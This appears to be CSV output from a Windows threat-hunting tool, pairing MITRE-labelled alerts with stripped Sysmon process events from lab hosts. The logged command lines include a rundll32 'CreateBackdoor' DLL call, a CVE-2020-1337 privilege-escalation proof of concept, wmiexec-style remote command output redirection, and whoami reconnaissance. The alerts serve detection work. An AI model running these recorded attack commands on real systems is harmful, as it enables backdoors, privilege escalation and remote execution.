5 + 4 + 1 + 0 + 0x8000000000000000 + + + 423994 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:36.012 + 747F3D96-51D0-5F93-0000-001036A15B00 + 3396 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 + C:\Users\IEUser\AppData\Local\Temp\tmp1375\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002085A50800 + 0x8a585 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51CD-5F93-0000-001073735B00 + 7624 + C:\Users\Public\test.tmp + 
c:\Users\Public\test.tmp + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1584766840.502366,2020-03-21T09:00:40.502366+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243568 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:39.417 + 747F3D96-9F77-5E75-0000-001090F32000 + 2416 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-9F61-5E75-0000-0010686A1E00 + 4848 + C:\Windows\System32\rundll32.exe + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237563.487498,2020-08-12T17:06:03.487498+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342412 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:06:01.636 + 747F3D96-E939-5F33-0000-0010ACAB0E00 + 7852 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e + 
C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\ + MSEDGEWIN10\IEUser + 747F3D96-E911-5F33-0000-0020241C0400 + 0x41c24 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E938-5F33-0000-00109CA00E00 + 7820 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe + WerTrigger.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Detect IIS/Exchange Exploitation,1558885676.667118,2019-05-26T19:47:56.667118+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\notepad.exe) and commandline ( C:\Windows\System32\notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5408 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-26 15:47:56.627 + 365ABB72-B52C-5CEA-0000-00107A0D1100 + 3388 + C:\Windows\System32\notepad.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Notepad + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\notepad.exe + c:\windows\system32\inetsrv\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=FC64B1EF19E7F35642B2A2EA5F5D9F4246866243,MD5=A4F6DF0E33E644E802C8798ED94D80EA,SHA256=B56AFE7165AD341A749D2D3BD925D879728A1FE4A4DF206145C1A69AA233F68B,IMPHASH=53A6715F589E88C4FD4541C81B4F57C3 + 365ABB72-B26B-5CEA-0000-0010582A0800 + 2744 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1579034897.447948,2020-01-15T00:48:17.447948+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( 
C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 345 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:17.270 + 747F3D96-2911-5E1E-0000-0010D80A7D00 + 2416 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "cmd.exe" /c notepad.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2910-5E1E-0000-002082EF7C00 + 0x7cef82 + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-2910-5E1E-0000-001053F57C00 + 4448 + C:\Windows\System32\cmd.exe + cmd.exe /c start ms-browser:// + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564909835.391457,2019-08-04T13:10:35.391457+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5703 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-04 09:10:30.702 + 747F3D96-A106-5D46-0000-00102425BD03 + 6604 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-A106-5D46-0000-00107201BD03 + 1380 + C:\Windows\System32\control.exe + "C:\Windows\System32\control.exe" /name 
Microsoft.BackupAndRestoreCenter + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237562.552084,2020-08-12T17:06:02.552084+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342411 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:06:00.734 + 747F3D96-E938-5F33-0000-00101CA50E00 + 7836 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\ + MSEDGEWIN10\IEUser + 747F3D96-E911-5F33-0000-0020241C0400 + 0x41c24 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E938-5F33-0000-00109CA00E00 + 7820 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe + WerTrigger.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 344 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:16.990 + 747F3D96-2910-5E1E-0000-001053F57C00 + 4448 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + 
Microsoft Corporation + Cmd.Exe + cmd.exe /c start ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2910-5E1E-0000-002082EF7C00 + 0x7cef82 + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-2910-5E1E-0000-0010F5F07C00 + 4612 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 344 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:16.990 + 747F3D96-2910-5E1E-0000-001053F57C00 + 4448 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /c start ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2910-5E1E-0000-002082EF7C00 + 0x7cef82 + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-2910-5E1E-0000-0010F5F07C00 + 4612 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( 
cmd.exe /c start ms-browser:// ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 344 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:16.990 + 747F3D96-2910-5E1E-0000-001053F57C00 + 4448 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /c start ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2910-5E1E-0000-002082EF7C00 + 0x7cef82 + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-2910-5E1E-0000-0010F5F07C00 + 4612 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557970296.456891,2019-05-16T05:31:36.456891+04:00,,Threat,Low,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C ipconfig ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17985 + + + + + Microsoft-Windows-Sysmon/Operational + DC1.insecurebank.local + + + + + + 2019-05-16 01:31:36.443 + DFAE8213-BD78-5CDC-0000-001091041300 + 3136 + C:\Windows\System32\cmd.exe + 6.3.9600.16384 (winblue_rtm.130821-1623) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /C ipconfig + C:\Users\administrator\ + insecurebank\Administrator + DFAE8213-BD78-5CDC-0000-002005FE1200 + 0x12fe05 + 0 + High + SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3 + DFAE8213-BD78-5CDC-0000-0010C7FE1200 + 3948 + 
C:\Windows\System32\winrshost.exe + C:\Windows\system32\WinrsHost.exe -Embedding + +",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /all) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8050 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-29 20:59:22.128 + 365ABB72-65AA-5CC7-0000-00104D882400 + 2116 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /all + C:\Users\IEUser\Documents\ + IEWIN7\IEUser + 365ABB72-5B3A-5CC7-0000-002096080100 + 0x10896 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-65A9-5CC7-0000-00104E5C2400 + 3376 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /all ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8050 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-29 20:59:22.128 + 365ABB72-65AA-5CC7-0000-00104D882400 + 2116 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + 
"C:\Windows\system32\whoami.exe" /all + C:\Users\IEUser\Documents\ + IEWIN7\IEUser + 365ABB72-5B3A-5CC7-0000-002096080100 + 0x10896 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-65A9-5CC7-0000-00104E5C2400 + 3376 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Command run remotely Using WMI,1603490254.745175,2020-10-24T01:57:34.745175+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 423991 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:29.192 + 747F3D96-51C9-5F93-0000-001010175B00 + 8796 + C:\Windows\System32\wbem\WmiPrvSE.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Provider Host + Microsoft® Windows® Operating System + Microsoft Corporation + Wmiprvse.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + C:\Windows\system32\ + NT AUTHORITY\NETWORK SERVICE + 747F3D96-C50A-5F93-0000-0020E4030000 + 0x3e4 + 0 + System + SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B + 00000000-0000-0000-0000-000000000000 + 836 + ? + ? 
+ +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243565 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.544 + 747F3D96-9F69-5E75-0000-0010729F2000 + 3536 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243565 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.544 + 747F3D96-9F69-5E75-0000-0010729F2000 + 3536 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 
windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237560.737148,2020-08-12T17:06:00.737148+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c reg query "HKLM\Software\WOW6432Node\Npcap" /ve 2>nul | find "REG_SZ" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342409 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:05:38.149 + 747F3D96-E922-5F33-0000-00107A2B0B00 + 6952 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe /c reg query "HKLM\Software\WOW6432Node\Npcap" /ve 2>nul | find "REG_SZ" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E909-5F33-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E90A-5F33-0000-0010863C0100 + 1740 + C:\Windows\System32\cmd.exe + C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat"" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564825609.436856,2019-08-03T13:46:49.436856+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( 
C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe"\system32\cleanmgr.exe /autoclean /d C: ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5134 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 09:46:49.331 + 747F3D96-5809-5D45-0000-00100B233F00 + 1380 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe"\system32\cleanmgr.exe /autoclean /d C: + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D4EA-5D45-0000-00105CD60000 + 1072 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243565 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.544 + 747F3D96-9F69-5E75-0000-0010729F2000 + 3536 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + 
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /all ) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9840 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:35:13.527 + 365ABB72-B181-5CC8-0000-00108DC71E00 + 692 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami /all + C:\ + IEWIN7\IEUser + 365ABB72-B17F-5CC8-0000-0020C6A31E00 + 0x1ea3c6 + 0 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-B181-5CC8-0000-001023C41E00 + 1256 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Command run remotely Using WMI,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 422746 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-20 22:35:26.747 + 747F3D96-662E-5F8F-0000-001023353800 + 6748 + 
C:\Windows\System32\wbem\WmiPrvSE.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Provider Host + Microsoft® Windows® Operating System + Microsoft Corporation + Wmiprvse.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + C:\Windows\system32\ + NT AUTHORITY\NETWORK SERVICE + 747F3D96-E130-5F8F-0000-0020E4030000 + 0x3e4 + 0 + System + SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B + 00000000-0000-0000-0000-000000000000 + 840 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237545.570757,2020-08-12T17:05:45.570757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342408 + + + + + 